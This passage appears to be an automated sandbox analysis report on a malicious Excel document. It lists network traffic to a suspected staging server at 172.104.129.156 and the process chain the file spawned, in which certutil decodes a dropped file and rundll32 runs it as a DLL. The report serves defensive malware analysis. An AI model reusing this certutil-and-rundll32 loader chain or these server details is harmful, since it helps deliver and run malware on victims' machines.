                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET8.8.8.8192.168.2.30x5a9No error (0)yahoo.com74.6.231.20A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET8.8.8.8192.168.2.30x5a9No error (0)yahoo.com98.137.11.163A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.263524055 CET8.8.8.8192.168.2.30x5a9No error (0)yahoo.com98.137.11.164A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.949115038 CET8.8.8.8192.168.2.30xe5d6No error (0)www.yahoo.comnew-fp-shed.wg1.b.yahoo.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.949115038 CET8.8.8.8192.168.2.30xe5d6No error (0)new-fp-shed.wg1.b.yahoo.com87.248.100.215A (IP address)IN (0x0001)
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.949115038 CET8.8.8.8192.168.2.30xe5d6No error (0)new-fp-shed.wg1.b.yahoo.com87.248.100.216A (IP address)IN (0x0001)

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • 172.104.129.156

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          0192.168.2.349707172.104.129.15680C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Jan 20, 2021 14:03:02.946541071 CET883OUTGET /campo/o/o HTTP/1.1
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                          Host: 172.104.129.156
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.114121914 CET884INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                          Date: Wed, 20 Jan 2021 13:03:02 GMT
                                                                                                                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                          Set-Cookie: ci_session=r2ce1jgfccpiedl3b3dpemllol14vptc; expires=Wed, 20-Jan-2021 15:03:02 GMT; Max-Age=7200; path=/; HttpOnly
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          Location: https://yahoo.com
                                                                                                                                                                                                          Content-Length: 599
                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Data Raw: 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 30 30 30 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 30 70 78 20 30 3b 22 3e 0a 0a 3c 68 34 3e 41 20 50 48 50 20 45 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 3c 2f 68 34 3e 0a 0a 3c 70 3e 53 65 76 65 72 69 74 79 3a 20 4e 6f 74 69 63 65 3c 2f 70 3e 0a 3c 70 3e 4d 65 73 73 61 67 65 3a 20 20 54 72 79 69 6e 67 20 74 6f 20 67 65 74 20 70 72 6f 70 65 72 74 79 20 27 68 69 74 73 27 20 6f 66 20 6e 6f 6e 2d 6f 62 6a 65 63 74 3c 2f 70 3e 0a 3c 70 3e 46 69 6c 65 6e 61 6d 65 3a 20 63 6f 6e 74 72 6f 6c 6c 65 72 73 2f 4c 6f 67 67 65 72 2e 70 68 70 3c 2f 70 3e 0a 3c 70 3e 4c 69 6e 65 20 4e 75 6d 62 65 72 3a 20 31 32 30 3c 2f 70 3e 0a 0a 0a 09 3c 70 3e 42 61 63 6b 74 72 61 63 65 3a 3c 2f 70 3e 0a 09 0a 09 09 0a 09 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 70 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 22 3e 0a 09 09 09 46 69 6c 65 3a 20 2f 76 61 72 2f 77 77 77 2f 6d 6d 6d 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2f 63 6f 6e 74 72 6f 6c 6c 65 72 73 2f 4c 6f 67 67 65 72 2e 70 68 70 3c 62 72 20 2f 3e 0a 09 09 09 4c 69 6e 65 3a 20 31 32 30 3c 62 72 20 2f 3e 0a 09 09 09 46 75 6e 63 74 69 6f 6e 3a 20 5f 65 72 72 6f 72 5f 68 61 6e 64 6c 65 72 09 09 09 3c 2f 70 3e 0a 0a 09 09 0a 09 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 70 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 22 3e 0a 09 09 09 46 69 6c 65 3a 20 2f 76 61 72 2f 77 77 77 2f 6d 6d 6d 2f 69 6e 64 65 78 2e 70 68 70 3c 62 72 20 2f 3e 0a 09 09 09 4c 69 6e 65 3a 20 33 31 35 3c 62 72 20 2f 3e 0a 09 09 09 46 75 6e 63 74 69 6f 6e 3a 20 72 65 71 75 69 72 65 5f 6f 6e 63 65 09 09 09 3c 2f 70 3e 0a 0a 09 09 0a 09 0a 0a 3c 2f 64 69 76 3e
                                                                                                                                                                                                          Data Ascii: <div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Notice</p><p>Message: Trying to get property 'hits' of non-object</p><p>Filename: controllers/Logger.php</p><p>Line Number: 120</p><p>Backtrace:</p><p style="margin-left:10px">File: /var/www/mmm/application/controllers/Logger.php<br />Line: 120<br />Function: _error_handler</p><p style="margin-left:10px">File: /var/www/mmm/index.php<br />Line: 315<br />Function: require_once</p></div>


                                                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                          Jan 20, 2021 14:03:03.555258989 CET74.6.143.26443192.168.2.349708CN=*.www.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Oct 08 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Wed Mar 31 14:00:00 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                          CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                          Jan 20, 2021 14:03:07.117407084 CET87.248.100.215443192.168.2.349709CN=*.www.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Oct 08 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Wed Mar 31 14:00:00 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                          CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028

                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          Analysis Process: EXCEL.EXE PID: 2996 Parent PID: 792

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:48
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                          Imagebase:0x2e0000
                                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Analysis Process: certutil.exe PID: 1488 Parent PID: 2996

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:53
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
                                                                                                                                                                                                          Imagebase:0xc10000
                                                                                                                                                                                                          File size:1273856 bytes
                                                                                                                                                                                                          MD5 hash:D056DF596F6E02A36841E69872AEF7BD
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                          Analysis Process: conhost.exe PID: 3984 Parent PID: 1488

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:53
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Analysis Process: certutil.exe PID: 204 Parent PID: 2996

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:57
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
                                                                                                                                                                                                          Imagebase:0xc10000
                                                                                                                                                                                                          File size:1273856 bytes
                                                                                                                                                                                                          MD5 hash:D056DF596F6E02A36841E69872AEF7BD
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                          Analysis Process: conhost.exe PID: 5640 Parent PID: 204

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:02:57
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Analysis Process: rundll32.exe PID: 3704 Parent PID: 2996

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:03:01
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Analysis Process: rundll32.exe PID: 5400 Parent PID: 3704

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:14:03:07
                                                                                                                                                                                                          Start date:20/01/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline: C:\ProgramData\ioq\ioq.dll,DllRegisterServer
                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                                          Reset < >